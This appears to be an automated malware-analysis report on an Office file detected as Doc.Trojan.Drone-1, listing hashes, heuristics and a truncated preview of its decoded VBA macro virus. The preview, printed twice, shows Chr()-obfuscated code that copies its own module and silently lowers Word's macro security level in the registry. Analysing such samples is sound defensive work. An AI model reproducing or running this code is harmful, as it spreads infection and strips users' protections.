Office (OLE) malware analysis — malicious · aa63fb72f31c060e

MALICIOUS

Office (OLE)

71.0 KB Created: 2001-05-26 08:22:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 1078ec2185500757b24751f41fd8d67f SHA-1: 7ad2a6b50383dd7c294253c145f9d4e85890c778 SHA-256: aa63fb72f31c060e382a9788bc6e5ec81c08e67a3c5e904022bff0b326efed0b

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that utilize CreateObject and GetObject, indicative of malicious intent to manipulate other applications. The script attempts to write to the registry key HKCU\Software\Microsoft\Office\8.0\Excel\Options\Microsoft Excel Options, likely to establish persistence or load a malicious component. ClamAV detection as Doc.Trojan.Drone-1 further supports its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Drone-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Drone-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17348 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17348 bytes
SHA-256: `55d9d0b8737a7b7854a167d7b473882281a9afd937124a85c7917fbe9b7ed42c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'ThunderDrome by Kernel32 Private Sub InfectExcel() On Error Resume Next With ThisWorkbook.VBProject.vbcomponents(Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(87) & Chr(111) & Chr(114) & Chr(107) & Chr(66) & Chr(111) & Chr(111) & Chr(107)).codemodule Code = .lines((2 - (2 - 1)), 1000) End With Set MsWord = GetObject(, Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(97) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110)) WasOn = (2 - (2 - 1)) If MsWord = "" Then Set MsWord = CreateObject(Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(97) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110)) WasOn = (4 - (2 + 2)) End If With MsWord.System .PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0 .PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1& .PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1& If .PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115 ... (truncated)

SHA-256: 55d9d0b8737a7b7854a167d7b473882281a9afd937124a85c7917fbe9b7ed42c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'ThunderDrome by Kernel32
Private Sub InfectExcel()
On Error Resume Next
With ThisWorkbook.VBProject.vbcomponents(Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(87) & Chr(111) & Chr(114) & Chr(107) & Chr(66) & Chr(111) & Chr(111) & Chr(107)).codemodule
Code = .lines((2 - (2 - 1)), 1000)
End With
Set MsWord = GetObject(, Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(97) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
WasOn = (2 - (2 - 1))
If MsWord = "" Then
Set MsWord = CreateObject(Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(46) & Chr(97) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
WasOn = (4 - (2 + 2))
End If
With MsWord.System
.PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(56) & Chr(46) & Chr(48) & Chr(92) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(32) & Chr(69) & Chr(120) & Chr(99) & Chr(101) & Chr(108), Chr(79) & Chr(112) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(115) & Chr(54)) = &H0
.PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(57) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
.PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(76) & Chr(101) & Chr(118) & Chr(101) & Chr(108)) = 1&
If .PrivateProfileString("", Chr(72) & Chr(75) & Chr(69) & Chr(89) & Chr(95) & Chr(67) & Chr(85) & Chr(82) & Chr(82) & Chr(69) & Chr(78) & Chr(84) & Chr(95) & Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(92) & Chr(83) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(79) & Chr(102) & Chr(102) & Chr(105) & Chr(99) & Chr(101) & Chr(92) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100) & Chr(92) & Chr(83) & Chr(101) & Chr(99) & Chr(117) & Chr(114) & Chr(105) & Chr(116) & Chr(121), Chr(65) & Chr(99) & Chr(99) & Chr(101) & Chr(115) & Chr(115
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.